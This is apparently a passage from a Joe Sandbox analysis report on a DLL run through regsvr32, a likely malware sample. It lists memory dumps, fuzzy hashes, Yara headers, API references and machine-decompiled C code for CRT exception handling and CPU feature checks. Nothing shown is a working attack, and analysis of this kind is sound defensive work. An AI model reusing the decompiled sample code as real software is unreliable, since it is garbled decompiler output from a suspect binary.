0x180006868
0x18000686b
0x180006871
0x18000687f
0x180006889
0x18000688d
0x180006890
0x180006893
0x18000689a
0x18000689c
0x18000689c
0x1800068a6
0x1800068b0
0x1800068b8
0x1800068ba
0x1800068be
0x1800068ca
0x1800068d1
0x1800068d4
0x1800068dc
0x1800068e9
0x1800068ed
0x180006905
0x180006909
0x18000690c
0x180006914
0x180006917
0x18000691e
0x18000693d
0x180006943
0x180006946
0x180006959
0x180006962
0x180006968
0x180006979
0x180006982
0x180006986
0x180006992
0x18000699b
0x1800069a6
0x1800069aa
0x1800069c7

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
Instruction ID: cb99d1167c8630c4161f8148837d3d56db0acdce36f97f7f4c16ea76a7bcc33d
Opcode Fuzzy Hash: 66125d16ff0b32e256dde8720e794326bf559e2f75bb0b9fe279f413c53e15a7
Instruction Fuzzy Hash: BF41C272310A5886EF85CF6AD95479973A2B74CFD0F19D422EE4D97B68DE3CC2458300

Uniqueness

Uniqueness Score: -1.00%

Function 0073B83C Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
Instruction ID: f0f4143308733c6b613d10fc1976db2b930a1afdf93f2980ccc893bd25ecca25
Opcode Fuzzy Hash: 7c06dbbd4d7f5d8b5a7dc781beb13b4593c6bbd5bd7959e7c7b22318daacb787
Instruction Fuzzy Hash: 61511971904749CBDB48CF64C8895DEBBF1FB48318F11875CE89AA7260D7B89A44CF45

Uniqueness

Uniqueness Score: -1.00%

Function 007390F8 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
Instruction ID: 83427dfa23f2a70278a699d02d0a66f070038fa0ac44bc3c67a0d98940a2abd4
Opcode Fuzzy Hash: ef86ec4cbab15db66684acca6e4eefc0d9a17a46b067acd768dfc4f73c7d9e5d
Instruction Fuzzy Hash: 0B51A2B090474E8FDB48CF68D48A5DE7FB0FB68398F204619E81596250D7B4D6A5CFC0

Uniqueness

Uniqueness Score: -1.00%

Function 00745CC4 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
Instruction ID: f005c9f9cfa4b43ef40a1f200820e7364ae690337b4d86acfb76df656cc06b6e
Opcode Fuzzy Hash: c42ee451b46e72c4fc1e7808b655d0298a624ad59252fa9ca8600e6c0870c205
Instruction Fuzzy Hash: FE51A4B090438E8FDB88CF68D88A5CE7BF0FB58358F105619F865A6250D3B8D664CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00755450 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
Instruction ID: 91ff94ea0c5782c6c7647ce2e012ae1efe71cbab2136cbe17c29bc20620c73ea
Opcode Fuzzy Hash: 1190db60a81a9605ea1e1068c6cf6b0ac0731fea71818b2d4916113a12896c76
Instruction Fuzzy Hash: 0D519DB490438E8FDB48CF68C88A5DF7BB1FB58348F004A19E825A6250D3B8D665CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0074CC84 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
Instruction ID: 392ce423c7346341374f25ca15bca0a147c997c9a5c649058bf5d583ff591b19
Opcode Fuzzy Hash: 4555d26f65456cde840fc2f4c666a8d56836cf0868c008055827d07d980c0c85
Instruction Fuzzy Hash: 0A41C3B090074E8FDB48DF64C48A5DE7FB0FB68388F104619E81AA6250D378D6A4CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0073FFB8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
Instruction ID: ffc56fd7168c6e695a14d31422796184757635042a1164aedc04677320af0710
Opcode Fuzzy Hash: c2ca811980bf69d3a725c6de3b3fc4f76b8583c10f578fbad8bf36fe51f88080
Instruction Fuzzy Hash: 9B3175B052D781ABD38CDF28D59991ABBE1FB89304F806A2DF98687350D774D445CB07

Uniqueness

Uniqueness Score: -1.00%

Function 00748E08 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
Instruction ID: efbb35fdfc96545695bc25e3bd00db16034c98cb8ef7f57b9f660a286bfd5c46
Opcode Fuzzy Hash: 830eef0a3232ecb80f2826221d342755302fd87f2307e2f844fd0bd61878f91c
Instruction Fuzzy Hash: 5F315AB450C7848BD348DF28C54A51ABBE1BB8D309F404B5DF8CAAA360D778D615CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 00744F18 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
Instruction ID: 623f27fec58fef4aaa379f7fbafc113b066f1698bb351901cc59bf5a19c6bb77
Opcode Fuzzy Hash: 2f0004951027548f87f8e7a2444adc3bba6861f54e8d6066d46ca53370045021
Instruction Fuzzy Hash: 1B218E70629380AFD388DF28D48981ABBF0BB89344F806A2DF8C68B360D775D445CB03

Uniqueness

Uniqueness Score: -1.00%

Function 007415C8 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
Instruction ID: 199196ca8ace7e8d42d391659d5c3f2c80ec6c3440db0b61eb753a63f83db2a3
Opcode Fuzzy Hash: 3eb31fd98d478cbf7892b0886e03ca27d91577c01988fac24f665ec931eb86f0
Instruction Fuzzy Hash: 622146B45187858BD349DF28D49941ABBE0FB8C31CF805B2DF4CAAA264D378D645CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800070A0 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000000011800070A0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0x800223a8 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0x80007101;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0x800223a8; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0x800223a8 = r8d;
				 *0x800223ac = r8d;
				return 0;
			}

0x1800070a0
0x1800070a6
0x1800070ab
0x1800070b2
0x1800070b2
0x1800070b9
0x1800070bb
0x1800070c3
0x1800070c9
0x1800070cd
0x1800070d3
0x1800070d7
0x1800070e1
0x1800070eb
0x1800070f6
0x1800070fa
0x180007101
0x18000710f

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
Instruction ID: 0b5ba2cec2f3816840067680c3456701fe7a71aa0eb5ae5909cae72e813b022f
Opcode Fuzzy Hash: c9ee34aa5c89bc7d17368121c5bc84d136a52ab8ed5c42389172ea663d2f6f8f
Instruction Fuzzy Hash: B2F062717142989EDBEACF6CA84275A77D0E30C3C0F90C029E6D983B04D63C82A48F44

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010190 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 249COMMON

Download Yara Rule

APIs

GetGestureInfo.USER32 ref: 00000001800101C0
CloseGestureInfoHandle.USER32 ref: 0000000180010672

Strings

8, xrefs: 00000001800101AB

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: GestureInfo$CloseHandle
String ID: 8
API String ID: 372500805-4194326291
Opcode ID: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
Instruction ID: 9b1c06a3f3b833ac3e132f42adadd70dae9d03e82ad46587f4b990887cf4d8b3
Opcode Fuzzy Hash: fdc52a30d4232624ee8151016c0fb58607a1878d599af251dc45c002f5d40a09
Instruction Fuzzy Hash: B8D1DD76608F888AD765CB29E45439EB7A0F7C9BD0F508116EACE83768DF78C545CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800106E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 0000000180010872
BeginPaint.USER32 ref: 0000000180010889
EndPaint.USER32 ref: 00000001800108B2
PostQuitMessage.USER32 ref: 00000001800108BC
DefWindowProcW.USER32 ref: 00000001800108E3

Strings

i, xrefs: 000000018001083A

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: PaintProcWindow$BeginMessagePostQuit
String ID: i
API String ID: 3181456275-3865851505
Opcode ID: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
Instruction ID: 3856721ac4770c8f636c1cd384f04675dc9eeb63fc6bf43fe2054305ebc0c00e
Opcode Fuzzy Hash: fcb843795d6400421a4bb60a8f9f2442e166c0b7f90a62d720e089610d409317
Instruction Fuzzy Hash: FA51ED32518AC8C6E7B2DB55E4543DEB360F788784F609516F6CA52A98CFBCC548DF40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000FCB0 Relevance: 13.7, APIs: 9, Instructions: 204COMMON

Download Yara Rule

APIs

CreatePen.GDI32 ref: 000000018000FCEE
SelectObject.GDI32 ref: 000000018000FD06
Polyline.GDI32 ref: 000000018000FFA3
MoveToEx.GDI32 ref: 000000018000FFE3
LineTo.GDI32 ref: 000000018001000C
MoveToEx.GDI32 ref: 0000000180010038
LineTo.GDI32 ref: 0000000180010061
SelectObject.GDI32 ref: 0000000180010074
DeleteObject.GDI32 ref: 000000018001007F

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Object$LineMoveSelect$CreateDeletePolyline
String ID:
API String ID: 1917832262-0
Opcode ID: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
Instruction ID: 377a05cc6cc4517dbb54ffd3f6057de865f15df1cc6264ad20f86e3ae03f80f6
Opcode Fuzzy Hash: 6075ceb34f4407423de1dccbff4bd8bdfe60344340a25c122dca44a040083570
Instruction Fuzzy Hash: CDB12276604B848AD766CB38E05135AF7A5F7C9784F108216EACE53B69DF3CD5498F00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003328 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 66%

			E00000001180003328(intOrPtr __ecx, void* __edx, void* __esi, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int* _t128;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t154;
				void* _t173;
				intOrPtr _t176;
				signed int _t177;
				signed int _t178;
				void* _t209;
				signed long long _t219;
				signed long long _t220;
				signed long long _t226;
				long long _t228;
				signed int _t235;
				intOrPtr* _t236;
				intOrPtr* _t237;
				signed long long _t246;
				long long _t267;
				signed int* _t280;
				long long _t281;
				void* _t282;
				void* _t283;
				signed long long _t284;
				long long _t296;
				signed int _t307;
				unsigned long long _t313;

				_t180 = __esi;
				_t282 = _t283 - 0x28;
				_t284 = _t283 - 0x128;
				_t219 =  *0x80021010; // 0xc11a2227b184
				_t220 = _t219 ^ _t284;
				 *(_t282 + 0x10) = _t220;
				_t280 =  *((intOrPtr*)(_t282 + 0x90));
				_t307 =  *((intOrPtr*)(_t282 + 0xa8));
				 *((long long*)(_t284 + 0x68)) = __r8;
				_t236 = __rcx;
				 *((long long*)(_t284 + 0x78)) = __rdx;
				 *(_t282 - 0x68) = _t307;
				 *((char*)(_t284 + 0x60)) = 0;
				_t281 = __r9;
				_t128 = E0000000118000427C(__ecx, __esi, __rcx, __rdx, __r9, __r9, _t282, _t280, __r9);
				r14d = _t128;
				if (_t128 - 0xffffffff < 0) goto 0x800037f7;
				if (_t128 - _t280[1] >= 0) goto 0x800037f7;
				if ( *_t236 != 0xe06d7363) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x80003474;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003474;
				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x80003474;
				E00000001180002D40(_t220);
				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x80003790;
				E00000001180002D40(_t220);
				_t237 =  *((intOrPtr*)(_t220 + 0x20));
				E00000001180002D40(_t220);
				 *((char*)(_t284 + 0x60)) = 1;
				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
				E00000001180002448(_t220,  *((intOrPtr*)(_t237 + 0x38)));
				if ( *_t237 != 0xe06d7363) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x8000342c;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8000342c;
				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x800037f7;
				E00000001180002D40(_t220);
				if ( *(_t220 + 0x38) == 0) goto 0x80003474;
				E00000001180002D40(_t220);
				E00000001180002D40(_t220);
				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
				if (E00000001180004314(_t220, _t237, _t237,  *(_t220 + 0x38), __r9) != 0) goto 0x8000346f;
				if (E00000001180004404(_t220, _t237,  *(_t220 + 0x38), __r9, _t282) == 0) goto 0x800037d4;
				goto 0x800037b0;
				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(__r9 + 8));
				 *(_t282 - 0x48) = _t280;
				if ( *_t237 != 0xe06d7363) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x80003747;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80003747;
				r15d = 0;
				if (_t280[3] - r15d <= 0) goto 0x80003678;
				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
				 *(_t284 + 0x20) = _t280;
				r8d = r14d;
				_t145 = E00000001180002134(_t237, _t282 - 0x28, _t282 - 0x48, __r9, _t282, _t280, __r9, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80003678;
				_t296 =  *((intOrPtr*)(_t282 - 0x28));
				r13d =  *((intOrPtr*)(_t282 - 0x30));
				 *((long long*)(_t282 - 0x80)) = _t296;
				_t146 = r13d;
				asm("inc ecx");
				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t146 - r14d > 0) goto 0x8000366b;
				_t226 =  *(_t282 - 0x60) >> 0x20;
				if (r14d - _t146 > 0) goto 0x8000366b;
				r12d = r15d;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(__r9 + 8));
				_t313 =  *(_t282 - 0x58) >> 0x20;
				 *((long long*)(_t282 - 0x70)) = _t267;
				if (r15d == 0) goto 0x80003658;
				_t246 = _t226 + _t226 * 4;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				_t59 = _t246 * 4; // 0x48ccccc35f40c483
				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + _t59 + 0x10));
				E0000000118000241C(_t226);
				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
				 *((long long*)(_t284 + 0x70)) = _t228;
				E0000000118000241C(_t228);
				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
				if (_t176 <= 0) goto 0x800035e8;
				E0000000118000241C(_t228);
				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
				if (E00000001180003A1C(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, __r9,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x800035f9;
				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
				 *((intOrPtr*)(_t284 + 0x64)) = _t154;
				if (_t154 > 0) goto 0x800035ac;
				r12d = r12d + 1;
				if (r12d == r15d) goto 0x8000365f;
				goto 0x80003565;
				 *((char*)(_t284 + 0x58)) =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) =  *((intOrPtr*)(_t284 + 0x60));
				 *((long long*)(_t284 + 0x48)) =  *(_t282 - 0x68);
				 *(_t284 + 0x40) =  *(_t282 + 0xa0);
				 *(_t284 + 0x38) = _t282 - 0x60;
				 *(_t284 + 0x30) =  *((intOrPtr*)(_t282 - 0x78));
				 *(_t284 + 0x28) = _t282 - 8;
				 *(_t284 + 0x20) = _t280;
				E00000001180003254(_t180, _t237, _t237,  *((intOrPtr*)(_t284 + 0x78)),  *((intOrPtr*)(_t284 + 0x68)), _t281);
				goto 0x80003664;
				goto 0x80003668;
				r15d = 0;
				r13d = r13d + 1;
				if (r13d -  *((intOrPtr*)(_t282 - 0x10)) < 0) goto 0x800034fd;
				if (( *_t280 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003784;
				_t209 = _t280[8] - r15d;
				if (_t209 == 0) goto 0x8000369e;
				E00000001180002408(_t282 - 8);
				if (_t209 != 0) goto 0x800036bf;
				if ((_t280[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003784;
				if (E00000001180001FD8(_t280[9] >> 0x00000002 & 0x00000001, _t282 - 8 + _t280[8], _t281, _t280) != 0) goto 0x80003784;
				if ((_t280[9] >> 0x00000002 & 0x00000001) != 0) goto 0x800037da;
				if (_t280[8] == r15d) goto 0x800036e4;
				E00000001180002408(_t282 - 8 + _t280[8]);
				_t235 = _t280[8];
				goto 0x800036e7;
				if (E00000001180004314(_t235, _t237, _t237, _t313, _t281) != 0) goto 0x80003784;
				E00000001180002068(_t237,  *((intOrPtr*)(_t284 + 0x78)), _t281, _t282, _t280, _t282 - 0x78);
				_t177 =  *((intOrPtr*)(_t282 + 0x98));
				 *(_t284 + 0x50) = _t177;
				_t178 = _t177 | 0xffffffff;
				 *((long long*)(_t284 + 0x48)) = _t281;
				 *(_t284 + 0x40) = _t313;
				 *(_t284 + 0x38) = _t178;
				 *(_t284 + 0x30) = _t178;
				 *(_t284 + 0x28) = _t280;
				 *(_t284 + 0x20) = _t313;
				E00000001180002274( *((intOrPtr*)(_t284 + 0x78)), _t237,  *((intOrPtr*)(_t284 + 0x68)), _t235);
				goto 0x80003784;
				if (_t280[3] <= 0) goto 0x80003784;
				if ( *((char*)(_t282 + 0x98)) != 0) goto 0x800037f7;
				 *(_t284 + 0x38) = _t307;
				 *(_t284 + 0x30) =  *(_t282 + 0xa0);
				 *(_t284 + 0x28) = r14d;
				 *(_t284 + 0x20) = _t280;
				E00000001180003800(_t237, _t237,  *((intOrPtr*)(_t284 + 0x78)), _t313, _t281);
				_t173 = E00000001180002D40(_t235);
				if ( *((long long*)(_t235 + 0x38)) != 0) goto 0x800037f7;
				return E000000011800010B0(_t173, _t178,  *(_t282 + 0x10) ^ _t284);
			}

0x180003328
0x180003335
0x18000333a
0x180003341
0x180003348
0x18000334b
0x18000334f
0x180003359
0x180003363
0x180003368
0x18000336b
0x180003376
0x18000337d
0x180003382
0x180003385
0x18000338a
0x180003390
0x180003399
0x1800033a5
0x1800033af
0x1800033c0
0x1800033cb
0x1800033d1
0x1800033db
0x1800033e1
0x1800033e6
0x1800033ea
0x1800033f3
0x1800033fc
0x180003401
0x18000340c
0x180003412
0x18000341f
0x180003426
0x18000342c
0x180003436
0x180003438
0x180003441
0x18000344c
0x180003458
0x180003464
0x18000346a
0x180003478
0x18000347c
0x180003486
0x180003490
0x1800034a1
0x1800034a7
0x1800034ae
0x1800034be
0x1800034c9
0x1800034ce
0x1800034d1
0x1800034d6
0x1800034da
0x1800034df
0x1800034e4
0x1800034eb
0x1800034f1
0x1800034f5
0x1800034f9
0x180003508
0x180003517
0x180003521
0x180003524
0x180003528
0x18000352f
0x180003539
0x180003540
0x180003546
0x18000354c
0x180003554
0x180003558
0x18000355f
0x180003568
0x18000356c
0x180003570
0x180003574
0x180003578
0x18000357b
0x18000358c
0x18000358f
0x180003594
0x1800035a1
0x1800035a4
0x1800035aa
0x1800035ac
0x1800035c7
0x1800035d2
0x1800035d8
0x1800035de
0x1800035e0
0x1800035e6
0x1800035e8
0x1800035ee
0x1800035f4
0x180003612
0x18000361a
0x180003622
0x18000362d
0x180003635
0x18000363e
0x180003647
0x18000364c
0x180003651
0x180003656
0x18000365d
0x180003668
0x18000366b
0x180003672
0x180003684
0x18000368a
0x18000368e
0x180003690
0x18000369c
0x1800036a6
0x1800036b9
0x1800036c7
0x1800036d1
0x1800036d3
0x1800036db
0x1800036e2
0x1800036f1
0x180003704
0x180003709
0x18000371a
0x18000371e
0x180003721
0x180003726
0x18000372b
0x18000372f
0x180003736
0x18000373b
0x180003740
0x180003745
0x18000374b
0x180003754
0x180003763
0x18000376b
0x180003772
0x18000377a
0x18000377f
0x180003784
0x18000378e
0x1800037af

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000000180003385

Part of subcall function 000000018000427C: __GetUnwindTryBlock.LIBCMT ref: 00000001800042BF
Part of subcall function 000000018000427C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000001800042E4

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000000018000345D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000001800036B2
std::bad_alloc::bad_alloc.LIBCMT ref: 00000001800037BE

Strings

csm, xrefs: 0000000180003480
csm, xrefs: 0000000180003406
csm, xrefs: 000000018000339F

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
Instruction ID: 68369fba8b053f101f7a0a57f2a328d7db6ec17b1fffbc4fe0a5b608d0144455
Opcode Fuzzy Hash: b6b7f02adf660401896063c6a860fb7c8eea0d446ae07e01c980b744b2235902
Instruction Fuzzy Hash: C0E1B272604B888AEBA6DF66D4423DD77A4F749BC8F008116FE8957B96CF34D698C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A3DC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
